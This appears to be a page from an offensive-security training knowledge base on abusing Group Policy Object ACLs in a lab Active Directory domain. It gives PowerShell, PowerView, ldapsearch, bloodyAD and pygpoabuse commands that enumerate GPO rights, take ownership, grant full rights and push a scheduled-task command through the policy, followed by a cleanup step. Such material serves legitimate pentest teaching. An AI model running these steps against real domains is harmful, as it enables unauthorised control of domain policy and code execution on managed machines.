Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 04. Techniques / GPO / Techniques

GPO ACL Abuse

GPO ACL abuse means we control the policy object strongly enough to edit it, grant ourselves edit rights, take ownership, or chain into SYSVOL modification. The target object is usually a groupPolicyContainer under CN=Policies,CN=System,DC=ootw,DC=local.

Enumerate GPO permissions

Get-GPO -All | ForEach-Object {
  $GpoName = $_.DisplayName
  Get-GPPermission -Name $GpoName -All |
    Select-Object @{Name='GPO';Expression={$GpoName}},Trustee,TrusteeType,Permission
}

PowerView ACL enumeration

Import-Module .\PowerView.ps1
Get-DomainObjectAcl -SearchBase "CN=Policies,CN=System,DC=ootw,DC=local" -ResolveGUIDs |
  Where-Object {
    $_.ActiveDirectoryRights -match "GenericAll|GenericWrite|WriteDacl|WriteOwner|CreateChild|WriteProperty"
  }

Find one GPO DN

Get-ADObject -LDAPFilter '(objectClass=groupPolicyContainer)' -SearchBase "CN=Policies,CN=System,DC=ootw,DC=local" -Properties displayName |
  Select-Object displayName,DistinguishedName

Grant edit rights with native cmdlets

Set-GPPermission -Name "Misconfigured Policy" -TargetName "student" -TargetType User -PermissionLevel GpoEditDeleteModifySecurity
Get-GPPermission -Name "Misconfigured Policy" -All

PowerView owner path

$GpoDN = "CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=ootw,DC=local"
Set-DomainObjectOwner -Identity $GpoDN -OwnerIdentity student
Add-DomainObjectAcl -TargetIdentity $GpoDN -PrincipalIdentity student -Rights All

Linux object check

ldapsearch -LLL -x -H ldap://10.10.10.200 -D "ootw.local\\student" -w 'student' -b "CN=Policies,CN=System,DC=ootw,DC=local" '(objectClass=groupPolicyContainer)' displayName name nTSecurityDescriptor

bloodyAD style path

bloodyAD --host 10.10.10.200 -d ootw.local -u student -p 'student' get object "CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=ootw,DC=local" --attr nTSecurityDescriptor

Abuse after edit rights

pygpoabuse.py "ootw.local/student:student@10.10.10.200" \
  -gpo-id "31B2F340-016D-11D2-945F-00C04FB984F9" \
  -command "cmd.exe /c whoami > C:\\Windows\\Temp\\gpo-acl.txt" \
  -taskname "AclTask"

Cleanup

Set-GPPermission -Name "Misconfigured Policy" -TargetName "student" -TargetType User -PermissionLevel None

Notes

Owning or editing the LDAP object is not always enough by itself. Working GPO abuse usually needs the LDAP metadata and the SYSVOL policy files to remain coherent.

WriteDACL is often the best path because we can grant ourselves the exact GPO edit right instead of trying to guess which low-level write will be accepted.